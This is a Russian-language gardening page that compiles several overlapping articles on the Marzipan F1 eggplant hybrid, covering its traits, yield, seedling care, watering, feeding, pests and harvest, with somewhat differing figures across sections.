19 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Баклажан марципан описание фото отзывы

Характеристика и описание баклажана Марципан F1, выращивание гибрида и уход

Сортов и гибридов баклажан выведено достаточно, чтобы овощеводы могли выбрать, какой из них им больше по вкусу. Например, баклажан Марципан F1 предпочитают те, кто любит крупные плоды с отличным вкусом. Это один из новых гибридов отечественной селекции, который кроме этих обладает еще и другими положительными качествами. Рассмотрим их подробнее.

Характеристики и описание гибрида

Баклажаны Марципан – среднеспелый гибрид, время от всходов семян до достижения плодами технической спелости составляет 120-127 суток. Пригоден к выращиванию в открытом грунте преимущественно в южных областях РФ, поскольку растения теплолюбивы. В центральной части России высаживают в теплицы или парники.

По описанию оригинатора этот гибрид имеет следующие характеристики:

  • кусты баклажана Марципан вырастают до 1 м в высоту;
  • растения прямостоячие;
  • листья зеленого цвета, крупные;
  • цветки у баклажана единичные или сосредоточены в соцветиях;
  • плоды крупные, мясистые, стандартной баклажановой формы;
  • длина среднего баклажана – 15 см, ширина – 8 см;
  • мякоть у них бледно-кремовая, сладковатая, не горькая;
  • семена мелкие, содержатся в небольшом количестве;
  • шкурка подов насыщенного фиолетового цвета, блестящая.

Урожайность гибрида Марципан F1 – 1,5-2 кг с 1 куста при массе плодов 03-0,6 кг. Баклажаны подходят для приготовления любых блюд, в которые входят баклажаны, но особенно удачно они получаются, если запекать их на решетке.

Достоинства и недостатки

Баклажан Марципан обладает достоинствами, ради которых овощеводы отводят под него место на своих огородах. Это:

  • возможность возделывания баклажан как на грядках в открытом грунте на юге России, так и в теплицах в других регионах;
  • отличный товарный вид;
  • приятный вкус плодов;
  • хорошая переносимость жары и засухи;
  • крупноплодность;
  • хорошая урожайность.

Недостатки у гибридных баклажан Марципан тоже имеются. Это непригодность семян к передаче наследственных качеств и необходимость формирования куста и подвязки, а также:

  • требовательность к освещению: при недостатке света шкурка плодов не приобретает характерной для них окраски, а остается светло-фиолетовой либо буреет;
  • хрупкость побегов, которые могут сломаться под весом поспевающих баклажан;
  • требовательность к температуре воды: при использовании для полива холодной жидкости растения могут сбрасывать цвет и завязь.

Но всего этого можно избежать, если обеспечить кустам грамотный уход.

Агротехника выращивания и ухода

Гибрид баклажанов Марципан F1 пригоден к выращиванию в открытом грунте или в теплице. Для этого сначала получают рассаду. Семена Марципана высевают в середине – конце марта. Под укрытие растения высаживают в мае, на грядки в открытый грунт – в июне, после того как окончательно потеплеет и не будет угрозы заморозков. К моменту пересадки растения должны быть в возрасте 50-70 дней.

Для выращивания рассады баклажанов подходят индивидуальные емкости: пластиковые или торфяные горшочки с дренажными отверстиями для стока лишней жидкости объемом 200-300 мл. Их наполняют плодородным грунтом и хорошо увлажняют. Высаживают семена и в общие неглубокие ящики, но при этом обязательно впоследствии растения пикируют.

Почву для посева готовят из дерновой земли и перегноя в соотношении 1:2 или смешивают эти два компонента с торфом в равных количествах. Еще один вариант: земля + перегной + крупный речной песок. Многие огородники также пользуются готовыми субстратами из магазина. Для посадки семян подходит универсальный грунт для рассады: такие смеси уже подготовлены для выращивания овощей и содержат все компоненты в идеальном соотношении. . Кислотность почвы для баклажанов должна быть нейтральной или слабокислой.

Семена гибридов в особой предварительной обработке перед посадкой не нуждаются. Их можно высаживать в почву сухими. По желанию посадочный материал можно только замочить в стимуляторах роста, что будет стимулировать более дружное появление всходов.

Сеют семена баклажанов гибрида Марципан в стаканчики по одному семечку на глубину 1-1,5 см, в ящичках между растениями оставляют 5-6 см. Емкости после посева накрывают стеклом или прозрачной плотной пленкой, ставят в теплом и светлом помещении при температуре 22-26 °C. Через 1-1,5 недели появляются первые всходы.

С этого момента световой день для растений должен быть равен 10 часам. Ночная температура – 17-19 °C. Рассаде необходим регулярный полив, но без переувлажнения и сильного пересыхания почвы. В фазе 2 настоящих листочков баклажановую рассаду из ящиков пересаживают в большие по объему емкости. Перед этим ее обильно поливают, чтобы растения можно было извлечь, не травмируя их корневую систему.

За период выращивания рассаду 2 раза подкармливают комплексными удобрениями с микроэлементами. За 1-1,5 недели до пересадки на грядки рассаду обязательно закаливают.

Для баклажанов Марципан выбирают хорошо освещенное место на огороде, так как они светолюбивые. Посадку рассады выполняют по схеме 3 растения на 1 метр в ряду с междурядьем в 75 см. Кустики пересаживают в лунки с комом земли, не травмируя корни, без заглубления. Почву обильно поливают. Кусты гибрида Марципан отличаются высоким ростом, потому их при достижении кустами 30 см начинают подвязывать.

Поливают баклажаны Марципан F1 в среднем 1 раз в 7 дней до цветения. После этого 1 раз в 3-4 дня. В жаркую погоду орошение проводят чаще – до 3-4 раз в неделю. Используют теплую воду. Поливают растения утром или вечером под корень. После этого проводят рыхление почвы.

Сохранить влагу и уменьшить частоту поливов помогает мульчирование грядок опилками, сухой травой, старой соломой.

Подкармливают кусты Марципана в фазе цветения комплексными препаратами. Используют, например, такой состав на 10 л воды:

  • мочевина – 1 ч. л.;
  • суперфосфат — 2 ст. л.;
  • сульфат калия – 1 ч. л.

Или разбрасывают 20 г нитроаммофоски на 1 м 2 площади грядки, а потом хорошо поливают землю, чтобы удобрение растворилось.

Во время плодоношения удобряют баклажаны фосфорно-калийными препаратами. Готовят состав из суперфосфата и калия сульфата ( по 2 ч. л. на 10 л воды). Если у взрослых баклажан листья становятся светло-зелеными, что говорит о недостатке азота, то дозу азотных удобрений увеличивают. Подкормки всегда совмещают с поливом.

Для получения хорошего урожая проводят формировку. У молодых растений баклажана Марципан оставляют 2 либо 3 самых хорошо развитых побега, остальные удаляют. Далее по мере роста прищипывают все пасынки и срезают нижние листья до центральной развилки.

Первый цветок также не оставляют. Образовавшийся из него плод будет оттягивать все питательные вещества на себя и мешать росту и формированию завязи на кусте. За 2-4 недели до завершения вегетации удаляют все цветки с растения и прищипывают точки роста. Это стимулирует рост и вызревание имеющихся плодов. Снимают урожай в фазе технической спелости, срезая плоды секатором. На семена их не оставляют.

Отзывы овощеводов

Отзывы, которые оставляют огородники о баклажанах Марципан, показывают, что это вполне достойный гибрид для выращивания его на домашних грядках.

Баклажан Марципан

Баклажан Марципан – молодой отечественный сорт, предназначенный для выращивания в сложных погодных условиях: от жары и засухи на юге, до суровых северных районов. Гибрид отлично показывает свои качества в условиях закрытого грунта и на открытых грядках. Марципан F1 обладает несомненным преимуществом перед классическими сортами – его мякоть не горчит.

История селекции сорта

Представитель обширного семейства пасленовых, баклажан, появился в России еще в 17 веке, но большую популярность начал приобретать совсем недавно. Экзотический плод постепенно стал привычным и появился на полях и в частных огородах.

Характерная горчинка, свойственная вкусу баклажанов, нравится не всем. Селекция последних лет направлена на устранение привкуса мякоти и выведение сортов, устойчивых к болезням и капризам климата. Особое внимание уделяется способности гибридов расти в открытом и закрытом грунте.

Марципан F1 – плод работы селекционеров из семеноводческой компании «Русский огород». Отечественный гибридный сорт баклажанов универсален: пригоден для выращивания как на юге страны, так и на Крайнем Севере в теплицах.

Описание баклажан Марципан

Сорт баклажанов Марципан относится к среднерослым гибридам. Его крепкий разветвленный куст достигает 1 м в высоту. Центральный одревесневающий стебель прямостоячий, листья крупные, насыщенно-зеленые. Цветки у Марципана F1 единичные, редко бывают собраны в небольшие соцветия.

В открытом грунте сорт возделывают только в южных регионах страны. Теплолюбивая культура требует помещения в парники и теплицы уже в умеренном климате центральных областей. В защищенном грунте хорошо растет в Нечерноземье, в северных районах РФ и на Дальнем Востоке. По отзывам, баклажан Марципан F1 популярен у дачников Подмосковья.

Описание плодов

Баклажаны сорта Марципан классической формы, грушевидные. Крупные, мясистые плоды отвечают таким характеристикам:

  • длина – до 15 см;
  • диаметр в самом широком месте – около 8 см;
  • мякоть белая с кремовым оттенком;
  • кожура темно-фиолетовая, блестящая;
  • семена малочисленные, мелкие;
  • вкус сладковатый, горечи нет.

На одном кусте баклажанов сорта Марципан, по отзывам, созревает до 4 шт. крупных и несколько мелких плодов. Небольшое количество компенсируется крупными размерами: вес одного спелого овоща может превышать 1000 г.

Характеристики сорта

Баклажан родом из тропиков и плохо переносит колебания температур. Если по ночам холодает до +15 °C, Марципан F1 останавливается в росте. При +5 °C куст погибает.

Урожайность и плодоношение

Среднеспелый Марципан F1 выращивают через рассаду. От посева семян до первых спелых баклажанов проходит от 120 до 130 дней. В теплом климате кусты плодоносят до конца октября.

С куста Марципана F1 возможно снять около 2 кг плодов, при среднем весе одного баклажана от 300 до 600 г. Культура крайне требовательна к качеству почвы. При хорошей аэрации грунта и регулярных подкормках, плоды вырастают больше 1 кг. На урожайность влияет даже наличие корки на поверхности земли. Регулярное рыхление улучшает состояние корней.

Корневая система баклажана развита слабее, чем надземная часть. Крупные плоды могут настолько утяжелить куст, что вывернут его из земли. Обильный урожай Марципана F1, наливающийся на стеблях, требует поддержки и подвязки.

Область применения плодов

Мякоть баклажанов сорта Марципан F1 обладает удивительно мягким вкусом. Что отражает его «сладкое» название. Характерная для баклажанов горечь отсутствует полностью, что позволяет использовать овощ в приготовлении любых блюд и упрощает заготовку плодов на зиму. Ценится сорт и за отсутствие явно выраженных семян.

Срок хранения собранных плодов – более месяца. Плотная кожура позволяет транспортировать Марципан F1 без потери товарного вида.

Устойчивость к заболеваниям и вредителям

Баклажан Марципан по характеристике и описанию сорта является устойчивым к большинству болезней и редко повреждается насекомыми. По отзывам огородников, все же существует заболевание типичное для данного гибрида.

Черная ножка – грибок прикорневой шейки, вызванный заражением грунта. Инфицирование стебля может погубить весь куст, поэтому важно проводить профилактическое обеззараживание грунта. Почву для посадки рассады, следует прокаливать в духовке.

Как и всем пасленовым, Марципану F1 угрожает нападение колорадского жука. После засыхания картофельной ботвы, вредители перебираются на баклажаны. В это время химическая обработка кустов невозможна, так как плоды уже начинают поспевать. Защищают посадки от жуков механическими методами: собирая вручную, стряхивая в емкости с листьев. Предупредить заражение можно, натянув поверх посадок мелкую сетку.

Достоинства и недостатки сорта

По отзывам о баклажане Марципан F1 возможно составить список его выгодных качеств:

  1. Выращивание в разном климате, благодаря универсальности сорта (для теплиц и открытого грунта).
  2. Устойчивость к краткосрочному пересыханию почвы и жаре.
  3. Крупноплодность и хороший вкус баклажанов.
  4. Стабильная урожайность.

В качестве недостатка называют невозможность использовать семена из выращенных плодов для разведения сорта в дальнейшем. Посадочный материал нужно покупать каждый год. Гибридный сорт Марципан F1 не передает свои характеристики через семенное размножение.

Особенности посадки и ухода

Проявятся ли в полной мере сортовые признаки, напрямую зависит от качества саженцев. Российские огородники традиционно выращивают рассаду самостоятельно. Для того чтобы Марципан F1 порадовал урожаем, следует знать несколько особенностей выращивания этого гибрида.

Семена и почва должны быть подготовлены к посадке, тогда в конце марта можно приступать к работам.

Особенности выращивания рассады баклажанов Марципан F1:

  1. Семена следует прогреть при 25 °C в течение 4–5 часов, а после поднять температуру до 40 °C и удерживать не менее получаса.
  2. Слабым раствором марганцовки протравливают посадочный материал около 20 минут.
  3. Грунт для посадки обязательно прокаливают в духовом шкафу для обеззараживания.
  4. Емкости с высаженными семенами содержат под пленкой при + 25 °C, после появления ростков, температуру снижают до + 20 °C.
  5. Пикируют баклажаны на стадии двух настоящих листиков, после образования 8-го листа, молодые растения можно переносить на постоянное место.

Рассаду Марципана F1 пересаживают в теплицу или парник после 15 мая. На открытые грядки выносят кусты при хорошем прогреве почвы, в первых числах июня.

Посадка сорта производится стандартно для баклажанов как на открытом участке, так и в теплицах. Для получения хорошего урожая следует знать требования, которые предъявляет культура к влажности и питательности почвы.

Особенности полива баклажанов:

  • как рассаду, так и взрослые растения поливают только подогретой водой (до 25 °C);
  • молодые баклажаны поливают раз в неделю, во время цветения – дважды, в августе поливы сокращают;
  • корка на почве губительна для корней: после полива проводят рыхление или мульчируют грядки;
  • переувлажнение для Марципана F1 опаснее засухи, грибковые поражения возникают от частых поливов.

Требовательность к подкормкам – отличительная черта баклажанов. Сорт Марципан F1 начинают удобрять еще на стадии рассады, при появлении второго листа. Пересаженные взрослые баклажаны удобряют дважды: в фазе цветения и в период роста плодов.

Заключение

Баклажан Марципан F1 требует правильного ухода для своего развития и проявления сортовых свойств. Полив, подкормка и содержание почвы в рыхлом состоянии – основные секреты выращивания баклажанов. Вкусные и красивые плоды порадуют и опытных огородников и тех, кто сажает сорт впервые.

Характеристика баклажана сорта Марципан

Баклажан Марципан F1 – полезная овощная культура, в которой содержатся витамины и микроэлементы. Характеристика баклажанов Марципан позволят изучить их особенности, правила выращивания и ухода, это принесет овощной урожай.

Характеристика баклажана сорта Марципан

Характеристика сорта

Баклажан Марципан является среднеспелым гибридом. Это теплолюбивая культура, высаживаются в южных регионах. Согласно описанию, срок получения зрелых овощей составляет 120-127 дней. С одного куста получают 2-3 овоща.

  • выносливость по отношению к плохим погодным условиям;
  • форма плодов и их вкусовые качества;
  • урожай с куста около 1,5-2 кг.

Стебель Марципанов устойчивый, по высоте достигает 1 м. Его подвязывают, чтобы куст не сломается. Цветки овоща одиночные или собраны в соцветия.

Плоды мясистые, вес 600 г. Мякоть кремового цвета, с маленьким количеством семян.

Выращивание

Выращивают баклажаны Марципан при соблюдении всех их особенностей.

Высадка семян

Баклажаны Марципан – гибридный сорт, поэтому семена не используются для посадки в следующем сезоне.

Семена высеваются в конце марта, они требуют подготовки: их прогревают в течение 4-х часов при температуре 24-26˚С, после выдерживаются около 40 минут при 40˚С. Для обеззараживания их замачивают на 20 ми в растворе марганцовки.

Для повышения всхожести семена выдерживаются 12 часов в растворе Циркон, после этого заматываются в мокрую ткань и перекладsdf.ncz в теплое место.

Грунт для рассады готовится самостоятельно: смешивают перегной с дёрном (2:1) и дезинфицируют в духовке.

Описание особенностей посадки семян Марципана F1:

  1. Емкости для посадки наполняют грунтом на 2/3 и увлажняют. В центральной части емкости делается углубление, в котором размещается пророщенное семя, покрывается небольшим слоем почвы. Пленкой прикрываются емкости.
  2. Если семена высаживаются в большой ящик, сверху на почве делаются борозды на расстоянии 5-6 см друг от друга. Ящик накрывается стеклом или пленкой и отправляется в теплое место с температурой 25-28˚С.
  3. Через 7 дней ожидаются всходы, после этого покрытие необходимо снять и сеянцы поместить в светлое место.
  4. Во избежание вытягивания рассады температура снижается до 19-20˚ С.
  5. Сеянцы поливают утром теплой водой, делают это осторожно, без размывания почвы.

Уход за ростками

Перед посадкой рассаду нужно закалить

Сеянцы пересаживают в емкости 10*10 см, после появления 2-х листиков.

Подготовка контейнеров для пересадки: на дне создаются отверстия, заполняется нетолстый слой дренажа из керамзита, гальки, битого кирпича.

За 2 часа до пересадки сеянцы требуется полить. Потом аккуратно перемещаются на новое место, присыпаются увлажненной почвой до семядольных листов. После пересадки наблюдается замедление роста, это связано с формированием мощной корневой системы. Растение оберегают от солнечных лучей.

Сорт Марципана F1 поливают через 5-6 дней после пикировки. За месяц до высадки на участок рассаду начинают закаливать. Емкости с растениями выносят на воздух, постепенно увеличивая время их нахождения на воздухе. Для этого контейнеры с растениями выносят на свежий воздух.

Высадка рассады

Рассаду Марципана высаживают на участок, когда выростает 8-12 листов.

Баклажаны – культура, любящая тепло, их пересадку в теплицу осуществляют после 14-15 мая, в открытый грунт – в начале июня.

При достижении куста 30 см делается первая подвязка, после появления боковых побегов их привязывают к опоре. На кусте оставляют 2-3 сильных побега, остальные удаляют. На главном стебле баклажана сорта Марципан F1 срываются все листья, которые растут ниже развилки. Выше развилки удаляются побеги без плодов. Для избавления сильной густоты на кустах возле верхушек стеблей удаляются по паре листов.

Для хорошего освещения и снижения риска повреждения серой гнилью листву обрывают. В обязательном порядке удаляются вторичные побеги.

Важно убрать сухие и поврежденные листья, в конце сезона верхушки стеблей прищепнуть и оставить до 7 завязей, они успеют доспеть до заморозков. В этот период обрывают и цветки.

Удобрение

Порядок внесения удобрения:

  • после появление первых листьев вносится смесь удобрений – на 10 л воды добавляется 5 г аммиачной селитры, 30 г суперфосфата, 10 г серо-кислого калия;
  • за 10 дней до высаживания сеянцев на участок в почву вносится раствор, исходя из разведения 60-70 г суперфосфата и 20-25 г калийной соли в 10 л воды.

Удобрять баклажаны нужно и во время цветения, и плодоношения:

  • при цветении готовится смесь для удобрения: в 10 л воды растворяются 5 г мочевины, сульфата калия, 20 г суперфосфата;
  • в период плодоношения используется раствор: 10 г суперфосфата, 10 г калийной соли в 10 л воды.

Полив

Поливать овощи нужно аккуратно, сохраняя почву в неразмытом состоянии. Лучшим вариантом полива будет капельная система. Баклажан сорта Марципан F1 чувствителен к температуре, оптимальная для полива будет вода 25-28˚С.

Поливать растение требуется утром, для сохранения влаги в почве осуществляют рыхление и мульчирование.

Периодичность полива зависит от условий климата: до цветения раз в 7 дней (ведро воды на м²). Если будет жаркая погода, полив увеличивают до 3-4 раз в неделю. В период цветения: 2 раза в неделю, в августе полив сокращается.

Баклажан Марципан: урожайность, характеристика и описание сорта

Существует множество сортов баклажан, среди которых дачники могут выбрать те, что удовлетворяют по срокам созревания, вкусовым качествам, цвету, размеру. Для тех, кто ценит крупные плоды, селекционеры вывели баклажан Марципан. Это один из новых гибридов, обладающий различными положительными свойствами.

Сорт получен селекционно-семеноводческой компанией «Русский Огород».

Особенности гибрида

Баклажан Марципан относится к среднеспелым сортам, сроком созревания 120-130 дней. Он подходит для выращивания в открытом грунте, в теплицах и парниках.

Оригинатор дает следующее описание растению:

  • высота куста до 1 метра;
  • растение прямостоячее;
  • листья крупные, зеленые;
  • цветет куст единичными или собранными в соцветия цветами;
  • плоды крупные, мясистые, классической формы;
  • размер плода в длину – до 16 см, в ширину – около 7 см;
  • мякоть сладковатая, не горчит, бледно-желтого оттенка;
  • кожица фиолетовая, блестящая;
  • семена мелкие, их мало.

Баклажан Марципан дает достаточно большое количество плодов. С одного растения можно собрать свыше двух килограмм вкусных синеньких, весом каждый от 300 до 600 грамм. Сорт предназначен для приготовления любых блюд, в том числе для консервирования. Марципан считается одним из лучших сортов для запекания плодов на решетке.

Недостатки и достоинства

По отзывам, баклажан Марципан обладает следующими достоинствами:

  • возможность выращивать растение в любых регионах страны, причем в южных он растет в открытом грунте, а в северных – в теплицах, парниках;
  • плоды имеют отличный товарный вид;
  • крупноплодность;
  • растение отлично переносит жару, засуху;
  • баклажаны вкусные, почти без семян;
  • отличная урожайность.

К недостаткам баклажана Марципан относят:

  • требовательность к освещению: нехватка света приводит к осветлению окраса шкурки;
  • хрупкость побегов под тяжестью плодов;
  • требовательность к температуре воды, используемой для полива: при использовании холодной воды, растение сбрасывает завязь и цветы.

Выращивание растений

Баклажан Марципан можно выращивать в открытом грунте, в теплице. Выращивают его через рассаду.

Семена растения высевают в конце февраля — в начале марта в рассадные ящики. Под укрытие рассаду высаживают в мае, в открытый грунт – в июне, после того как окончательно потеплеет и минует угроза обратных заморозков. К моменту пересадки рассаде должно быть 60-70 дней.

Выращивание рассады

Сорт баклажана Марципан высаживают в конце февраля – в начале марта. Раньше этого периода высаживают семена только при условии, что будет обеспечена дополнительная подсветка.

Прежде чем приступить к посеву, необходимо подготовить все необходимое. Начать стоит с выбора грунта – его можно приготовить самостоятельно или же приобрести готовый субстрат в дачном магазине. Последний вариант имеет все необходимые вещества, микроэлементы.

При самостоятельном изготовлении грунта, готовится смесь из одной части песка, трех частей перегноя и четырех частей торфа. На ведро грунта добавляют ложку суперфосфата, стакан древесной золы.

Посадочные ящики наполняют на две трети грунтом, поливают. Затем делают бороздки глубиной 0.5 см. В них раскладывают семена на расстоянии друг от друга 1-2 см. Для ускорения прорастания и предотвращения пересыхания верхних слоев грунта, ящики накрывают стеклом или пленкой.

Прорастание семян происходит при температуре 25 градусов.

На стадии семядольных листочков, рекомендуется провести пикировку всходов по отдельным емкостям. Во время пересадки следует быть предельно осторожными, чтобы не повредить корневую систему. По отзывам, баклажаны Марципан F1 тяжело восстанавливают поврежденные корни.

Изначально баклажанам достаточно тех питательных веществ, которые содержатся в грунте. По мере роста и развития рассады, проводят усиленные подкормки. Лучше всего отдать предпочтение комплексным удобрениям для рассады. Их применяют согласно инструкции.

За две недели до высадки на постоянное место, рассаду закаливают, постепенно приучая к свежему воздуху. Начинать следует с 15 минут, постепенно увеличивая время пребывания рассады под прямым солнцем.

Высадка на постоянное место

Баклажаны – растения, любящие свет и тепло, поэтому их высаживают, когда температура будет держаться на отметке 17-20 градусов. Если она опустится до 15 или поднимется выше 30, то растения сбрасывают бутоны.

Согласно описанию сорта и характеристикам баклажана Марципан, перед высадкой рассады на постоянное место, необходимо провести подготовку. За сутки до планируемой высадки, кустики обильно поливают. Повторяют полив непосредственно перед высадкой.

Высаживают растения по схеме три куста на один квадратный метр. Между рядами сохраняют расстояние не менее 60 см, пересаживают рассаду вместе с комом земли, не травмируя корневую систему.

Уход за растением

По описанию, баклажаны Марципан не нуждаются в особом уходе. Эти растения не любят обильных поливов – достаточно 5 литров воды на квадратный метр. Поливают грядки раз в неделю. После поливов почву рыхлят. Если растения выращиваются в теплице, то ее следует проветривать.

Во время роста, кусты необходимо формировать. Обычно баклажаны ведут в 2-3 стебля, все остальные побеги удаляют. Оставленные побеги подвязывают к опоре. Также удаляют все листья, которые затеняют стебли, цветки.

При выращивании баклажан в северных регионах, кусты прищипывают на высоте 30-35 см. При этом на одном растении оставляют не больше шести завязей.

Общие правила ухода

Чтобы получить хороший урожай, необходимо соблюдать следующие правила ухода:

  1. На протяжении всего лета необходимо рыхлить почву, чтобы она не уплотнялась. Особенно тщательно следят за грунтом после дождей, поливов.
  2. Грядка с кустами должна быть всегда слегка влажной. Чтобы получить, как на фото, баклажаны Марципан, по отзывам, следует поливать раз в неделю. Этот сорт не боится засухи, но и не переносить пересушенности земляного кома.
  3. За весь период подкормок развития растений, необходимо провести три подкормки. Первая выполняется через десять дней после высадки рассады, вторая – через две недели после первой, а третий раз кусты подкармливают в период начала плодоношения.
  4. Баклажаны относятся к растениям, которые наращивают придаточные корни. Это помогает повысить урожайность. Чтобы стимулировать образование корней, необходимо провести окучивание растений.
  5. Грядки необходимо пропалывать, проводить осмотры кустов на предмет вредителей, болезней.

Болезни, вредители

Баклажаны относятся к семейству пасленовых, куда входят томаты. Эти растения болеют одинаковыми заболеваниями.

Фитофтороз – это широко распространенное грибковое заболевание, для которого характерно появление ржавых пятен на листве. В сухую погоду листья сохнут и опадают, а в дождливую – покрываются налетом, гниют. Для борьбы с болезнью используют медный купорос, бордоскую жидкость. Обработку растений проводят после захода солнца. Профилактика фитофтороза включает сжигание больных растений после сбора урожая. Хорошо помогает обработка кустов чесночным раствором – двести грамм настаивают в трех литрах воды трое суток. Затем раствор разводят водой в пропорции 1:1.

Заразиться баклажаны могут мозаикой. Это болезнь вирусной природы, при которой происходит деформация листьев – они покрываются бледно-зелеными узорами. На плодах появляются желтые пятна. Пораженные кусты удаляют, весь инструмент обрабатывается. Здоровые на вид растения обязательно обрабатывают противовирусным препаратом. Для профилактики мозаики, проводят обработку растений мыльным раствором, приготовленным из 20 грамм хозяйственного мыла, разведенного в литре водя.

Баклажаны часто поражает тля. Она высасывает сок растения, приводя к скручиванию листочков, гибели куста. Для борьбы с тлей применяют химикаты или народные средства. Помогает справиться с вредителем настойка золы: стакан золы смешивают с 10 литрами воды и ложкой зеленого мыла. Составу дают настояться сутки, затем им обрабатывают баклажаны. Чтобы уберечь растения от тли, необходимо проветривать теплицу, а также раз в две недели проводить профилактические обработки кустов химиками или раствором золы.

В сухую погоду растения могут повреждать паутинные клещи. Вредители питаются клеточным соком. Для борьбы с ним проводят обработки растений специальными химикатами строго по инструкции. В качестве профилактики заражения растений, проводят опрыскивания баклажан водой в жаркую сухую погоду. Эту процедуру выполняют утром и вечером.

Сбор урожая

Как можно понять по описанию и фото, баклажаны Марципан дают хороший урожай. При его сборе следует учитывать сроки созревания плодов. Слишком ранний сбор даст горьковатые плоды, а у позднего – будут слишком крупные семена и жесткая мякоть. Поэтому плоды снимают в период технической спелости, примерно через месяц с момента цветения. Явный признак готовности плодов к уборке – яркий выраженный глянец плодов характерной темно-фиолетовой окраски.

Овощи срезают ножницами или секатором вместе с плодоножкой. Эту процедуру следует выполнять аккуратно, чтобы не повредить куст. Собранные овощи употребляют в пищу сразу, так как они не могут длительно храниться – при хранении баклажаны становятся мягкими, кожица их сморщивается. Овощи могут сохранить свой вид и вкус не дольше трех недель при условии хранения в холодильнике.

Баклажан Марципан F1 — характеристика и описание сорта, отзывы и урожайность

Баклажан Марципан – очень удачный гибрид отечественной селекции, который год за годом становится все более популярным среди овощеводов. Сорт можно смело назвать универсальным. Его можно выращивать и в тепличных условиях, и на незащищенных участках земли. Мякоть баклажанов Марципан полностью лишена горечи, а плоды вырастают большими и привлекательными внешне. Марципан подходит для приготовления всех блюд, состав которых предусматривает баклажаны. Он обладает отменными вкусовыми качествами.

Урожайность кустов и качество их плодов зависит от условий выращивания растений. Марципан, как и все другие сорта баклажанов, имеет свои требования, которые необходимо учитывать.

Характеристики и описание сорта баклажана Марципан F1

Гибрид Марципан f1 пользуется большой популярностью. На форумах появляется все больше отзывов об этом баклажане с фото полученного урожая.

Ботаническая характеристика

Описание сорта следует начать с его ботанической характеристики:

Показатель Характеристика
Разновидность Гибрид
Внешность Плоды Цилиндрические, темно-фиолетового цвета с кремовой мякотью. Размер крупный
Кусты Высокие (около 1 м в высоту) и раскидистые
Средняя масса плода 300-600 г
Сроки дозревания плодов Среднеспелый
Уровень урожайности Высокий
Место выращивания Открытый грунт, под пленкой, теплица, парник
Вкусовые качества мякоти Приятный вкус без горечи

В плодах сосредоточено небольшое количество мелких семян. Они не сохраняют признаки материнского растения, поэтому выведение баклажанов данного сорта из собственных семян невозможно.

Урожайность

Специалисты отмечают Марципан как высокоурожайный гибрид. С 1 куста растения снимают от 1,5 до 2 кг урожая. При средней массе баклажана 300-600 г получается до 6 плодов с каждого куста.

По сравнению со многими другими сортами, которые плодоносят 2-3 баклажанами с 1 растения, это совсем немало.

С другой стороны, существует масса отзывов от агрономов, имеющих опыт выращивания Марципана. Чаще всего они отмечают сорт как среднеурожайный.

Конфликт показателей урожайности вызван разными подходами к уходу за растением. Достичь максимального урожая можно только при условии соблюдения всех рекомендаций по выращиванию гибрида Марципан.

Достоинства и недостатки

Сорт имеет свои достоинства и недостатки:

Достоинства Недостатки
Одинаково хорошо растет в тепличных условиях и на открытых участках Высокие требования к условиям освещения
Аппетитный внешний вид Хрупкие ветки, которые часто ломаются под весом плодов
Прекрасные вкусовые качества, полное отсутствие горечи Непереносимость холодной воды
Устойчивость к высоким температурам и засухе Необходимость подвязки и формирования куста
Крупные размеры плодов Отсутствие генетической памяти у семян
Высокая урожайность

При грамотном подходе к выращиванию баклажанов все недостатки легко устраняются и компенсируются многочисленными преимуществами сорта.

Выращивание рассады баклажанов Марципан

Рассада Марципана очень требовательна к температурным условиям ее содержания. В остальном выведение растений из семян не отличается от стандартной процедуры выращивания рассады баклажанов.

Особенности посева семян

Семена растения можно высевать в общий контейнер, специальные кассеты или рассаживать по отдельным горшочкам. С точки зрения экономии пространства первые 2 способа более эффективны.

Почва должна быть легкой, но в то же время питательной. Можно приобрести готовый грунт для рассады либо приготовить почвосмесь самостоятельно. Для этого смешивают следующие компоненты:

  • перегной – ½;
  • дерновая земля – ¼;
  • разрыхлитель (песок, вермикулит, кокосовое волокно) – ¼.

Посадочный материал заглубляют на 1 см во влажный грунт. Сверху емкость с семенами накрывают пленкой или стеклом. Укрытие снимают ежедневно на 15-30 мин для проветривания и полностью после появления всходов.

Семена проращивают при высокой температуре – от 25 до 28⁰С. После всходов ее понижают до 18 — 20⁰С. Более высокая температура содержания ростков приводит к вытягиванию и перерастанию рассады.

Если посевы производили в общий контейнер или кассеты для рассады, баклажаны требуют пикировки. Процедуру проводят на стадии 2 настоящих листиков. Для пересадки используют ту же почву, что и для посева семян.

Освещение

Пока семена не прорастут, они не нуждаются в свете. Но как только появятся первые ростки, сеянцы переносят в хорошо освещенное место. Оптимальная продолжительность светового дня для рассады баклажана составляет 10 часов. Желательно размещать емкости на южных, в крайнем случае, на восточных, западных подоконниках.

На северной стороне рассада будет испытывать нехватку света – ее придется досвечивать.

Недостаток света замедляет рост баклажанов. Медленно растущая рассада не будет готова к пересадке на открытые участки. Ее придется доращивать, вследствие чего огородник потеряет время и снимет меньше урожая.

Полив

Почва всегда должна быть влажной, но не переувлажненной. Поливы производят путем орошения земли из пульверизатора. Если лить воду прямо на почву, семена вымоются из грунта.

Проточная водопроводная вода не очень хорошо подходит для Марципана. Лучше всего использовать отстоянную дождевую воду или собранный заранее талый снег.

После пикировки рассаду не поливают на протяжении 5 дней. Растение очень плохо переносит пересадку, поэтому после перемещения в новые условия оно приостанавливает рост на время адаптации.

Пересадка рассады в грунт и дальнейший уход

После пересадки кусты Марципана требуют определенных условий содержания. Неправильно организованный уход может стать причиной низкой урожайности и гибели баклажанов.

Подготовка к пересадке и закалка

За 3 недели до высадки рассады в открытый грунт ее закаляют. Емкости с молодыми растениями ежедневно выносят на свежий воздух на определенное количество времени. С каждым днем время нахождения баклажанов на улице увеличивают.

Закаленная рассада быстрее адаптируется на грядках.

К пересадке готовят не только растения, но и почву. Осенью землю перекапывают вместе с перегноем. Весной участок заново вскапывают и удаляют из почвы сорняки. За день до высадки землю разрыхляют и поливают большим количеством воды.

Предназначенный для Марципана участок должен быть хорошо освещаемым и не продуваться сквозняками. При планировке грядок следует избегать низинных мест, поскольку там скапливается много влаги.

Пересаживание в грунт

В ОГ пересаживают баклажаны, у которых уже распустилось от 8 до 12 листьев. Пересадку планируют не раньше середины июня, когда ночные заморозки можно смело исключить.

Кусты Марципана растут высокими и раскидистыми. Это следует учитывать при распределении лунок. Расстояние между растениями должно быть не менее 35 см.

Схема посадки баклажанов

Растения данного сорта требуют подвязки. Если опоры установить перед высадкой баклажанов, шанс травмировать корневую систему растений аннулируется.

Выкопанные лунки обогащают золой и сильно заливают водой. После посадки землю вокруг кустов немного притаптывают и мульчируют.
